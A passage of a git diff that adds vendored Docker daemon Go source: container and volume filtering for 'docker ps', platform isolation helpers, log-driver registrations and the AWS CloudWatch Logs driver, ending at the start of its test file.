@@ -0,0 +1,10 @@ +// +build !linux + +package daemon + +import "github.com/docker/docker/container" + +// sqliteMigration performs the link graph DB migration. No-op on platforms other than Linux +func (daemon *Daemon) sqliteMigration(_ map[string]*container.Container) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/list.go b/vendor/github.com/docker/docker/daemon/list.go new file mode 100644 index 0000000000..02805ea62b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list.go @@ -0,0 +1,660 @@ +package daemon + +import ( + "errors" + "fmt" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/volume" + "github.com/docker/go-connections/nat" +) + +var acceptedVolumeFilterTags = map[string]bool{ + "dangling": true, + "name": true, + "driver": true, + "label": true, +} + +var acceptedPsFilterTags = map[string]bool{ + "ancestor": true, + "before": true, + "exited": true, + "id": true, + "isolation": true, + "label": true, + "name": true, + "status": true, + "health": true, + "since": true, + "volume": true, + "network": true, + "is-task": true, +} + +// iterationAction represents possible outcomes happening during the container iteration. +type iterationAction int + +// containerReducer represents a reducer for a container. +// Returns the object to serialize by the api. +type containerReducer func(*container.Container, *listContext) (*types.Container, error) + +const ( + // includeContainer is the action to include a container in the reducer. + includeContainer iterationAction = iota + // excludeContainer is the action to exclude a container in the reducer. + excludeContainer + // stopIteration is the action to stop iterating over the list of containers. + stopIteration +) + +// errStopIteration makes the iterator to stop without returning an error. +var errStopIteration = errors.New("container list iteration stopped") + +// List returns an array of all containers registered in the daemon. +func (daemon *Daemon) List() []*container.Container { + return daemon.containers.List() +} + +// listContext is the daemon generated filtering to iterate over containers. +// This is created based on the user specification from types.ContainerListOptions. +type listContext struct { + // idx is the container iteration index for this context + idx int + // ancestorFilter tells whether it should check ancestors or not + ancestorFilter bool + // names is a list of container names to filter with + names map[string][]string + // images is a list of images to filter with + images map[image.ID]bool + // filters is a collection of arguments to filter with, specified by the user + filters filters.Args + // exitAllowed is a list of exit codes allowed to filter with + exitAllowed []int + + // beforeFilter is a filter to ignore containers that appear before the one given + beforeFilter *container.Container + // sinceFilter is a filter to stop the filtering when the iterator arrive to the given container + sinceFilter *container.Container + + // taskFilter tells if we should filter based on wether a container is part of a task + taskFilter bool + // isTask tells us if the we should filter container that are a task (true) or not (false) + isTask bool + // ContainerListOptions is the filters set by the user + *types.ContainerListOptions +} + +// byContainerCreated is a temporary type used to sort a list of containers by creation time. +type byContainerCreated []*container.Container + +func (r byContainerCreated) Len() int { return len(r) } +func (r byContainerCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byContainerCreated) Less(i, j int) bool { + return r[i].Created.UnixNano() < r[j].Created.UnixNano() +} + +// Containers returns the list of containers to show given the user's filtering. +func (daemon *Daemon) Containers(config *types.ContainerListOptions) ([]*types.Container, error) { + return daemon.reduceContainers(config, daemon.transformContainer) +} + +func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Container { + idSearch := false + names := ctx.filters.Get("name") + ids := ctx.filters.Get("id") + if len(names)+len(ids) == 0 { + // if name or ID filters are not in use, return to + // standard behavior of walking the entire container + // list from the daemon's in-memory store + return daemon.List() + } + + // idSearch will determine if we limit name matching to the IDs + // matched from any IDs which were specified as filters + if len(ids) > 0 { + idSearch = true + } + + matches := make(map[string]bool) + // find ID matches; errors represent "not found" and can be ignored + for _, id := range ids { + if fullID, err := daemon.idIndex.Get(id); err == nil { + matches[fullID] = true + } + } + + // look for name matches; if ID filtering was used, then limit the + // search space to the matches map only; errors represent "not found" + // and can be ignored + if len(names) > 0 { + for id, idNames := range ctx.names { + // if ID filters were used and no matches on that ID were + // found, continue to next ID in the list + if idSearch && !matches[id] { + continue + } + for _, eachName := range idNames { + if ctx.filters.Match("name", eachName) { + matches[id] = true + } + } + } + } + + cntrs := make([]*container.Container, 0, len(matches)) + for id := range matches { + if c := daemon.containers.Get(id); c != nil { + cntrs = append(cntrs, c) + } + } + + // Restore sort-order after filtering + // Created gives us nanosec resolution for sorting + sort.Sort(sort.Reverse(byContainerCreated(cntrs))) + + return cntrs +} + +// reduceContainers parses the user's filtering options and generates the list of containers to return based on a reducer. +func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reducer containerReducer) ([]*types.Container, error) { + var ( + containers = []*types.Container{} + ) + + ctx, err := daemon.foldFilter(config) + if err != nil { + return nil, err + } + + // fastpath to only look at a subset of containers if specific name + // or ID matches were provided by the user--otherwise we potentially + // end up locking and querying many more containers than intended + containerList := daemon.filterByNameIDMatches(ctx) + + for _, container := range containerList { + t, err := daemon.reducePsContainer(container, ctx, reducer) + if err != nil { + if err != errStopIteration { + return nil, err + } + break + } + if t != nil { + containers = append(containers, t) + ctx.idx++ + } + } + + return containers, nil +} + +// reducePsContainer is the basic representation for a container as expected by the ps command. +func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *listContext, reducer containerReducer) (*types.Container, error) { + container.Lock() + defer container.Unlock() + + // filter containers to return + action := includeContainerInList(container, ctx) + switch action { + case excludeContainer: + return nil, nil + case stopIteration: + return nil, errStopIteration + } + + // transform internal container struct into api structs + return reducer(container, ctx) +} + +// foldFilter generates the container filter based on the user's filtering options. +func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listContext, error) { + psFilters := config.Filters + + if err := psFilters.Validate(acceptedPsFilterTags); err != nil { + return nil, err + } + + var filtExited []int + + err := psFilters.WalkValues("exited", func(value string) error { + code, err := strconv.Atoi(value) + if err != nil { + return err + } + filtExited = append(filtExited, code) + return nil + }) + if err != nil { + return nil, err + } + + err = psFilters.WalkValues("status", func(value string) error { + if !container.IsValidStateString(value) { + return fmt.Errorf("Unrecognised filter value for status: %s", value) + } + + config.All = true + return nil + }) + if err != nil { + return nil, err + } + + var taskFilter, isTask bool + if psFilters.Include("is-task") { + if psFilters.ExactMatch("is-task", "true") { + taskFilter = true + isTask = true + } else if psFilters.ExactMatch("is-task", "false") { + taskFilter = true + isTask = false + } else { + return nil, fmt.Errorf("Invalid filter 'is-task=%s'", psFilters.Get("is-task")) + } + } + + err = psFilters.WalkValues("health", func(value string) error { + if !container.IsValidHealthString(value) { + return fmt.Errorf("Unrecognised filter value for health: %s", value) + } + + return nil + }) + if err != nil { + return nil, err + } + + var beforeContFilter, sinceContFilter *container.Container + + err = psFilters.WalkValues("before", func(value string) error { + beforeContFilter, err = daemon.GetContainer(value) + return err + }) + if err != nil { + return nil, err + } + + err = psFilters.WalkValues("since", func(value string) error { + sinceContFilter, err = daemon.GetContainer(value) + return err + }) + if err != nil { + return nil, err + } + + imagesFilter := map[image.ID]bool{} + var ancestorFilter bool + if psFilters.Include("ancestor") { + ancestorFilter = true + psFilters.WalkValues("ancestor", func(ancestor string) error { + id, err := daemon.GetImageID(ancestor) + if err != nil { + logrus.Warnf("Error while looking up for image %v", ancestor) + return nil + } + if imagesFilter[id] { + // Already seen this ancestor, skip it + return nil + } + // Then walk down the graph and put the imageIds in imagesFilter + populateImageFilterByParents(imagesFilter, id, daemon.imageStore.Children) + return nil + }) + } + + return &listContext{ + filters: psFilters, + ancestorFilter: ancestorFilter, + images: imagesFilter, + exitAllowed: filtExited, + beforeFilter: beforeContFilter, + sinceFilter: sinceContFilter, + taskFilter: taskFilter, + isTask: isTask, + ContainerListOptions: config, + names: daemon.nameIndex.GetAll(), + }, nil +} + +// includeContainerInList decides whether a container should be included in the output or not based in the filter. +// It also decides if the iteration should be stopped or not. +func includeContainerInList(container *container.Container, ctx *listContext) iterationAction { + // Do not include container if it's in the list before the filter container. + // Set the filter container to nil to include the rest of containers after this one. + if ctx.beforeFilter != nil { + if container.ID == ctx.beforeFilter.ID { + ctx.beforeFilter = nil + } + return excludeContainer + } + + // Stop iteration when the container arrives to the filter container + if ctx.sinceFilter != nil { + if container.ID == ctx.sinceFilter.ID { + return stopIteration + } + } + + // Do not include container if it's stopped and we're not filters + if !container.Running && !ctx.All && ctx.Limit <= 0 { + return excludeContainer + } + + // Do not include container if the name doesn't match + if !ctx.filters.Match("name", container.Name) { + return excludeContainer + } + + // Do not include container if the id doesn't match + if !ctx.filters.Match("id", container.ID) { + return excludeContainer + } + + if ctx.taskFilter { + if ctx.isTask != container.Managed { + return excludeContainer + } + } + + // Do not include container if any of the labels don't match + if !ctx.filters.MatchKVList("label", container.Config.Labels) { + return excludeContainer + } + + // Do not include container if isolation doesn't match + if excludeContainer == excludeByIsolation(container, ctx) { + return excludeContainer + } + + // Stop iteration when the index is over the limit + if ctx.Limit > 0 && ctx.idx == ctx.Limit { + return stopIteration + } + + // Do not include container if its exit code is not in the filter + if len(ctx.exitAllowed) > 0 { + shouldSkip := true + for _, code := range ctx.exitAllowed { + if code == container.ExitCode() && !container.Running && !container.StartedAt.IsZero() { + shouldSkip = false + break + } + } + if shouldSkip { + return excludeContainer + } + } + + // Do not include container if its status doesn't match the filter + if !ctx.filters.Match("status", container.State.StateString()) { + return excludeContainer + } + + // Do not include container if its health doesn't match the filter + if !ctx.filters.ExactMatch("health", container.State.HealthString()) { + return excludeContainer + } + + if ctx.filters.Include("volume") { + volumesByName := make(map[string]*volume.MountPoint) + for _, m := range container.MountPoints { + if m.Name != "" { + volumesByName[m.Name] = m + } else { + volumesByName[m.Source] = m + } + } + + volumeExist := fmt.Errorf("volume mounted in container") + err := ctx.filters.WalkValues("volume", func(value string) error { + if _, exist := container.MountPoints[value]; exist { + return volumeExist + } + if _, exist := volumesByName[value]; exist { + return volumeExist + } + return nil + }) + if err != volumeExist { + return excludeContainer + } + } + + if ctx.ancestorFilter { + if len(ctx.images) == 0 { + return excludeContainer + } + if !ctx.images[container.ImageID] { + return excludeContainer + } + } + + networkExist := fmt.Errorf("container part of network") + if ctx.filters.Include("network") { + err := ctx.filters.WalkValues("network", func(value string) error { + if _, ok := container.NetworkSettings.Networks[value]; ok { + return networkExist + } + for _, nw := range container.NetworkSettings.Networks { + if nw.EndpointSettings == nil { + continue + } + if nw.NetworkID == value { + return networkExist + } + } + return nil + }) + if err != networkExist { + return excludeContainer + } + } + + return includeContainer +} + +// transformContainer generates the container type expected by the docker ps command. +func (daemon *Daemon) transformContainer(container *container.Container, ctx *listContext) (*types.Container, error) { + newC := &types.Container{ + ID: container.ID, + Names: ctx.names[container.ID], + ImageID: container.ImageID.String(), + } + if newC.Names == nil { + // Dead containers will often have no name, so make sure the response isn't null + newC.Names = []string{} + } + + image := container.Config.Image // if possible keep the original ref + if image != container.ImageID.String() { + id, err := daemon.GetImageID(image) + if _, isDNE := err.(ErrImageDoesNotExist); err != nil && !isDNE { + return nil, err + } + if err != nil || id != container.ImageID { + image = container.ImageID.String() + } + } + newC.Image = image + + if len(container.Args) > 0 { + args := []string{} + for _, arg := range container.Args { + if strings.Contains(arg, " ") { + args = append(args, fmt.Sprintf("'%s'", arg)) + } else { + args = append(args, arg) + } + } + argsAsString := strings.Join(args, " ") + + newC.Command = fmt.Sprintf("%s %s", container.Path, argsAsString) + } else { + newC.Command = container.Path + } + newC.Created = container.Created.Unix() + newC.State = container.State.StateString() + newC.Status = container.State.String() + newC.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode) + // copy networks to avoid races + networks := make(map[string]*networktypes.EndpointSettings) + for name, network := range container.NetworkSettings.Networks { + if network == nil || network.EndpointSettings == nil { + continue + } + networks[name] = &networktypes.EndpointSettings{ + EndpointID: network.EndpointID, + Gateway: network.Gateway, + IPAddress: network.IPAddress, + IPPrefixLen: network.IPPrefixLen, + IPv6Gateway: network.IPv6Gateway, + GlobalIPv6Address: network.GlobalIPv6Address, + GlobalIPv6PrefixLen: network.GlobalIPv6PrefixLen, + MacAddress: network.MacAddress, + NetworkID: network.NetworkID, + } + if network.IPAMConfig != nil { + networks[name].IPAMConfig = &networktypes.EndpointIPAMConfig{ + IPv4Address: network.IPAMConfig.IPv4Address, + IPv6Address: network.IPAMConfig.IPv6Address, + } + } + } + newC.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks} + + newC.Ports = []types.Port{} + for port, bindings := range container.NetworkSettings.Ports { + p, err := nat.ParsePort(port.Port()) + if err != nil { + return nil, err + } + if len(bindings) == 0 { + newC.Ports = append(newC.Ports, types.Port{ + PrivatePort: uint16(p), + Type: port.Proto(), + }) + continue + } + for _, binding := range bindings { + h, err := nat.ParsePort(binding.HostPort) + if err != nil { + return nil, err + } + newC.Ports = append(newC.Ports, types.Port{ + PrivatePort: uint16(p), + PublicPort: uint16(h), + Type: port.Proto(), + IP: binding.HostIP, + }) + } + } + + if ctx.Size { + sizeRw, sizeRootFs := daemon.getSize(container) + newC.SizeRw = sizeRw + newC.SizeRootFs = sizeRootFs + } + newC.Labels = container.Config.Labels + newC.Mounts = addMountPoints(container) + + return newC, nil +} + +// Volumes lists known volumes, using the filter to restrict the range +// of volumes returned. +func (daemon *Daemon) Volumes(filter string) ([]*types.Volume, []string, error) { + var ( + volumesOut []*types.Volume + ) + volFilters, err := filters.FromParam(filter) + if err != nil { + return nil, nil, err + } + + if err := volFilters.Validate(acceptedVolumeFilterTags); err != nil { + return nil, nil, err + } + + volumes, warnings, err := daemon.volumes.List() + if err != nil { + return nil, nil, err + } + + filterVolumes, err := daemon.filterVolumes(volumes, volFilters) + if err != nil { + return nil, nil, err + } + for _, v := range filterVolumes { + apiV := volumeToAPIType(v) + if vv, ok := v.(interface { + CachedPath() string + }); ok { + apiV.Mountpoint = vv.CachedPath() + } else { + apiV.Mountpoint = v.Path() + } + volumesOut = append(volumesOut, apiV) + } + return volumesOut, warnings, nil +} + +// filterVolumes filters volume list according to user specified filter +// and returns user chosen volumes +func (daemon *Daemon) filterVolumes(vols []volume.Volume, filter filters.Args) ([]volume.Volume, error) { + // if filter is empty, return original volume list + if filter.Len() == 0 { + return vols, nil + } + + var retVols []volume.Volume + for _, vol := range vols { + if filter.Include("name") { + if !filter.Match("name", vol.Name()) { + continue + } + } + if filter.Include("driver") { + if !filter.Match("driver", vol.DriverName()) { + continue + } + } + if filter.Include("label") { + v, ok := vol.(volume.DetailedVolume) + if !ok { + continue + } + if !filter.MatchKVList("label", v.Labels()) { + continue + } + } + retVols = append(retVols, vol) + } + danglingOnly := false + if filter.Include("dangling") { + if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") { + danglingOnly = true + } else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") { + return nil, fmt.Errorf("Invalid filter 'dangling=%s'", filter.Get("dangling")) + } + retVols = daemon.volumes.FilterByUsed(retVols, !danglingOnly) + } + return retVols, nil +} + +func populateImageFilterByParents(ancestorMap map[image.ID]bool, imageID image.ID, getChildren func(image.ID) []image.ID) { + if !ancestorMap[imageID] { + for _, id := range getChildren(imageID) { + populateImageFilterByParents(ancestorMap, id, getChildren) + } + ancestorMap[imageID] = true + } +} diff --git a/vendor/github.com/docker/docker/daemon/list_unix.go b/vendor/github.com/docker/docker/daemon/list_unix.go new file mode 100644 index 0000000000..91c9caccf4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list_unix.go @@ -0,0 +1,11 @@ +// +build linux freebsd solaris + +package daemon + +import "github.com/docker/docker/container" + +// excludeByIsolation is a platform specific helper function to support PS +// filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. +func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { + return includeContainer +} diff --git a/vendor/github.com/docker/docker/daemon/list_windows.go b/vendor/github.com/docker/docker/daemon/list_windows.go new file mode 100644 index 0000000000..7fbcd3af26 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list_windows.go @@ -0,0 +1,20 @@ +package daemon + +import ( + "strings" + + "github.com/docker/docker/container" +) + +// excludeByIsolation is a platform specific helper function to support PS +// filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. +func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { + i := strings.ToLower(string(container.HostConfig.Isolation)) + if i == "" { + i = "default" + } + if !ctx.filters.Match("isolation", i) { + return excludeContainer + } + return includeContainer +} diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go new file mode 100644 index 0000000000..ad343c1e8e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go @@ -0,0 +1,15 @@ +package daemon + +import ( + // Importing packages here only to make sure their init gets called and + // therefore they register themselves to the logdriver factory. + _ "github.com/docker/docker/daemon/logger/awslogs" + _ "github.com/docker/docker/daemon/logger/fluentd" + _ "github.com/docker/docker/daemon/logger/gcplogs" + _ "github.com/docker/docker/daemon/logger/gelf" + _ "github.com/docker/docker/daemon/logger/journald" + _ "github.com/docker/docker/daemon/logger/jsonfilelog" + _ "github.com/docker/docker/daemon/logger/logentries" + _ "github.com/docker/docker/daemon/logger/splunk" + _ "github.com/docker/docker/daemon/logger/syslog" +) diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go new file mode 100644 index 0000000000..f3002b97e2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go @@ -0,0 +1,13 @@ +package daemon + +import ( + // Importing packages here only to make sure their init gets called and + // therefore they register themselves to the logdriver factory. + _ "github.com/docker/docker/daemon/logger/awslogs" + _ "github.com/docker/docker/daemon/logger/etwlogs" + _ "github.com/docker/docker/daemon/logger/fluentd" + _ "github.com/docker/docker/daemon/logger/jsonfilelog" + _ "github.com/docker/docker/daemon/logger/logentries" + _ "github.com/docker/docker/daemon/logger/splunk" + _ "github.com/docker/docker/daemon/logger/syslog" +) diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go new file mode 100644 index 0000000000..fee518db4b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go @@ -0,0 +1,404 @@ +// Package awslogs provides the logdriver for forwarding container logs to Amazon CloudWatch Logs +package awslogs + +import ( + "errors" + "fmt" + "os" + "runtime" + "sort" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/aws/aws-sdk-go/aws" + "github.com/aws/aws-sdk-go/aws/awserr" + "github.com/aws/aws-sdk-go/aws/ec2metadata" + "github.com/aws/aws-sdk-go/aws/request" + "github.com/aws/aws-sdk-go/aws/session" + "github.com/aws/aws-sdk-go/service/cloudwatchlogs" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/dockerversion" +) + +const ( + name = "awslogs" + regionKey = "awslogs-region" + regionEnvKey = "AWS_REGION" + logGroupKey = "awslogs-group" + logStreamKey = "awslogs-stream" + tagKey = "tag" + batchPublishFrequency = 5 * time.Second + + // See: http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html + perEventBytes = 26 + maximumBytesPerPut = 1048576 + maximumLogEventsPerPut = 10000 + + // See: http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/cloudwatch_limits.html + maximumBytesPerEvent = 262144 - perEventBytes + + resourceAlreadyExistsCode = "ResourceAlreadyExistsException" + dataAlreadyAcceptedCode = "DataAlreadyAcceptedException" + invalidSequenceTokenCode = "InvalidSequenceTokenException" + + userAgentHeader = "User-Agent" +) + +type logStream struct { + logStreamName string + logGroupName string + client api + messages chan *logger.Message + lock sync.RWMutex + closed bool + sequenceToken *string +} + +type api interface { + CreateLogStream(*cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) + PutLogEvents(*cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) +} + +type regionFinder interface { + Region() (string, error) +} + +type wrappedEvent struct { + inputLogEvent *cloudwatchlogs.InputLogEvent + insertOrder int +} +type byTimestamp []wrappedEvent + +// init registers the awslogs driver +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates an awslogs logger using the configuration passed in on the +// context. Supported context configuration variables are awslogs-region, +// awslogs-group, and awslogs-stream. When available, configuration is +// also taken from environment variables AWS_REGION, AWS_ACCESS_KEY_ID, +// AWS_SECRET_ACCESS_KEY, the shared credentials file (~/.aws/credentials), and +// the EC2 Instance Metadata Service. +func New(ctx logger.Context) (logger.Logger, error) { + logGroupName := ctx.Config[logGroupKey] + logStreamName, err := loggerutils.ParseLogTag(ctx, "{{.FullID}}") + if err != nil { + return nil, err + } + + if ctx.Config[logStreamKey] != "" { + logStreamName = ctx.Config[logStreamKey] + } + client, err := newAWSLogsClient(ctx) + if err != nil { + return nil, err + } + containerStream := &logStream{ + logStreamName: logStreamName, + logGroupName: logGroupName, + client: client, + messages: make(chan *logger.Message, 4096), + } + err = containerStream.create() + if err != nil { + return nil, err + } + go containerStream.collectBatch() + + return containerStream, nil +} + +// newRegionFinder is a variable such that the implementation +// can be swapped out for unit tests. +var newRegionFinder = func() regionFinder { + return ec2metadata.New(session.New()) +} + +// newAWSLogsClient creates the service client for Amazon CloudWatch Logs. +// Customizations to the default client from the SDK include a Docker-specific +// User-Agent string and automatic region detection using the EC2 Instance +// Metadata Service when region is otherwise unspecified. +func newAWSLogsClient(ctx logger.Context) (api, error) { + var region *string + if os.Getenv(regionEnvKey) != "" { + region = aws.String(os.Getenv(regionEnvKey)) + } + if ctx.Config[regionKey] != "" { + region = aws.String(ctx.Config[regionKey]) + } + if region == nil || *region == "" { + logrus.Info("Trying to get region from EC2 Metadata") + ec2MetadataClient := newRegionFinder() + r, err := ec2MetadataClient.Region() + if err != nil { + logrus.WithFields(logrus.Fields{ + "error": err, + }).Error("Could not get region from EC2 metadata, environment, or log option") + return nil, errors.New("Cannot determine region for awslogs driver") + } + region = &r + } + logrus.WithFields(logrus.Fields{ + "region": *region, + }).Debug("Created awslogs client") + + client := cloudwatchlogs.New(session.New(), aws.NewConfig().WithRegion(*region)) + + client.Handlers.Build.PushBackNamed(request.NamedHandler{ + Name: "DockerUserAgentHandler", + Fn: func(r *request.Request) { + currentAgent := r.HTTPRequest.Header.Get(userAgentHeader) + r.HTTPRequest.Header.Set(userAgentHeader, + fmt.Sprintf("Docker %s (%s) %s", + dockerversion.Version, runtime.GOOS, currentAgent)) + }, + }) + return client, nil +} + +// Name returns the name of the awslogs logging driver +func (l *logStream) Name() string { + return name +} + +// Log submits messages for logging by an instance of the awslogs logging driver +func (l *logStream) Log(msg *logger.Message) error { + l.lock.RLock() + defer l.lock.RUnlock() + if !l.closed { + // buffer up the data, making sure to copy the Line data + l.messages <- logger.CopyMessage(msg) + } + return nil +} + +// Close closes the instance of the awslogs logging driver +func (l *logStream) Close() error { + l.lock.Lock() + defer l.lock.Unlock() + if !l.closed { + close(l.messages) + } + l.closed = true + return nil +} + +// create creates a log stream for the instance of the awslogs logging driver +func (l *logStream) create() error { + input := &cloudwatchlogs.CreateLogStreamInput{ + LogGroupName: aws.String(l.logGroupName), + LogStreamName: aws.String(l.logStreamName), + } + + _, err := l.client.CreateLogStream(input) + + if err != nil { + if awsErr, ok := err.(awserr.Error); ok { + fields := logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "origError": awsErr.OrigErr(), + "logGroupName": l.logGroupName, + "logStreamName": l.logStreamName, + } + if awsErr.Code() == resourceAlreadyExistsCode { + // Allow creation to succeed + logrus.WithFields(fields).Info("Log stream already exists") + return nil + } + logrus.WithFields(fields).Error("Failed to create log stream") + } + } + return err +} + +// newTicker is used for time-based batching. newTicker is a variable such +// that the implementation can be swapped out for unit tests. +var newTicker = func(freq time.Duration) *time.Ticker { + return time.NewTicker(freq) +} + +// collectBatch executes as a goroutine to perform batching of log events for +// submission to the log stream. Batching is performed on time- and size- +// bases. Time-based batching occurs at a 5 second interval (defined in the +// batchPublishFrequency const). Size-based batching is performed on the +// maximum number of events per batch (defined in maximumLogEventsPerPut) and +// the maximum number of total bytes in a batch (defined in +// maximumBytesPerPut). Log messages are split by the maximum bytes per event +// (defined in maximumBytesPerEvent). There is a fixed per-event byte overhead +// (defined in perEventBytes) which is accounted for in split- and batch- +// calculations. +func (l *logStream) collectBatch() { + timer := newTicker(batchPublishFrequency) + var events []wrappedEvent + bytes := 0 + for { + select { + case <-timer.C: + l.publishBatch(events) + events = events[:0] + bytes = 0 + case msg, more := <-l.messages: + if !more { + l.publishBatch(events) + return + } + unprocessedLine := msg.Line + for len(unprocessedLine) > 0 { + // Split line length so it does not exceed the maximum + lineBytes := len(unprocessedLine) + if lineBytes > maximumBytesPerEvent { + lineBytes = maximumBytesPerEvent + } + line := unprocessedLine[:lineBytes] + unprocessedLine = unprocessedLine[lineBytes:] + if (len(events) >= maximumLogEventsPerPut) || (bytes+lineBytes+perEventBytes > maximumBytesPerPut) { + // Publish an existing batch if it's already over the maximum number of events or if adding this + // event would push it over the maximum number of total bytes. + l.publishBatch(events) + events = events[:0] + bytes = 0 + } + events = append(events, wrappedEvent{ + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(string(line)), + Timestamp: aws.Int64(msg.Timestamp.UnixNano() / int64(time.Millisecond)), + }, + insertOrder: len(events), + }) + bytes += (lineBytes + perEventBytes) + } + } + } +} + +// publishBatch calls PutLogEvents for a given set of InputLogEvents, +// accounting for sequencing requirements (each request must reference the +// sequence token returned by the previous request). +func (l *logStream) publishBatch(events []wrappedEvent) { + if len(events) == 0 { + return + } + + // events in a batch must be sorted by timestamp + // see http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html + sort.Sort(byTimestamp(events)) + cwEvents := unwrapEvents(events) + + nextSequenceToken, err := l.putLogEvents(cwEvents, l.sequenceToken) + + if err != nil { + if awsErr, ok := err.(awserr.Error); ok { + if awsErr.Code() == dataAlreadyAcceptedCode { + // already submitted, just grab the correct sequence token + parts := strings.Split(awsErr.Message(), " ") + nextSequenceToken = &parts[len(parts)-1] + logrus.WithFields(logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "logGroupName": l.logGroupName, + "logStreamName": l.logStreamName, + }).Info("Data already accepted, ignoring error") + err = nil + } else if awsErr.Code() == invalidSequenceTokenCode { + // sequence code is bad, grab the correct one and retry + parts := strings.Split(awsErr.Message(), " ") + token := parts[len(parts)-1] + nextSequenceToken, err = l.putLogEvents(cwEvents, &token) + } + } + } + if err != nil { + logrus.Error(err) + } else { + l.sequenceToken = nextSequenceToken + } +} + +// putLogEvents wraps the PutLogEvents API +func (l *logStream) putLogEvents(events []*cloudwatchlogs.InputLogEvent, sequenceToken *string) (*string, error) { + input := &cloudwatchlogs.PutLogEventsInput{ + LogEvents: events, + SequenceToken: sequenceToken, + LogGroupName: aws.String(l.logGroupName), + LogStreamName: aws.String(l.logStreamName), + } + resp, err := l.client.PutLogEvents(input) + if err != nil { + if awsErr, ok := err.(awserr.Error); ok { + logrus.WithFields(logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "origError": awsErr.OrigErr(), + "logGroupName": l.logGroupName, + "logStreamName": l.logStreamName, + }).Error("Failed to put log events") + } + return nil, err + } + return resp.NextSequenceToken, nil +} + +// ValidateLogOpt looks for awslogs-specific log options awslogs-region, +// awslogs-group, and awslogs-stream +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case logGroupKey: + case logStreamKey: + case regionKey: + case tagKey: + default: + return fmt.Errorf("unknown log opt '%s' for %s log driver", key, name) + } + } + if cfg[logGroupKey] == "" { + return fmt.Errorf("must specify a value for log opt '%s'", logGroupKey) + } + return nil +} + +// Len returns the length of a byTimestamp slice. Len is required by the +// sort.Interface interface. +func (slice byTimestamp) Len() int { + return len(slice) +} + +// Less compares two values in a byTimestamp slice by Timestamp. Less is +// required by the sort.Interface interface. +func (slice byTimestamp) Less(i, j int) bool { + iTimestamp, jTimestamp := int64(0), int64(0) + if slice != nil && slice[i].inputLogEvent.Timestamp != nil { + iTimestamp = *slice[i].inputLogEvent.Timestamp + } + if slice != nil && slice[j].inputLogEvent.Timestamp != nil { + jTimestamp = *slice[j].inputLogEvent.Timestamp + } + if iTimestamp == jTimestamp { + return slice[i].insertOrder < slice[j].insertOrder + } + return iTimestamp < jTimestamp +} + +// Swap swaps two values in a byTimestamp slice with each other. Swap is +// required by the sort.Interface interface. +func (slice byTimestamp) Swap(i, j int) { + slice[i], slice[j] = slice[j], slice[i] +} + +func unwrapEvents(events []wrappedEvent) []*cloudwatchlogs.InputLogEvent { + cwEvents := []*cloudwatchlogs.InputLogEvent{} + for _, input := range events { + cwEvents = append(cwEvents, input.inputLogEvent) + } + return cwEvents +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go new file mode 100644 index 0000000000..d5b1aaef52 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go @@ -0,0 +1,724 @@ +package awslogs + +import ( + "errors" + "fmt" + "net/http" + "reflect" + "runtime" + "strings" + "testing" + "time" + + "github.com/aws/aws-sdk-go/aws" + "github.com/aws/aws-sdk-go/aws/awserr" + "github.com/aws/aws-sdk-go/aws/request" + "github.com/aws/aws-sdk-go/service/cloudwatchlogs" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/dockerversion" +) + +const ( + groupName = "groupName" + streamName = "streamName" + sequenceToken = "sequenceToken" + 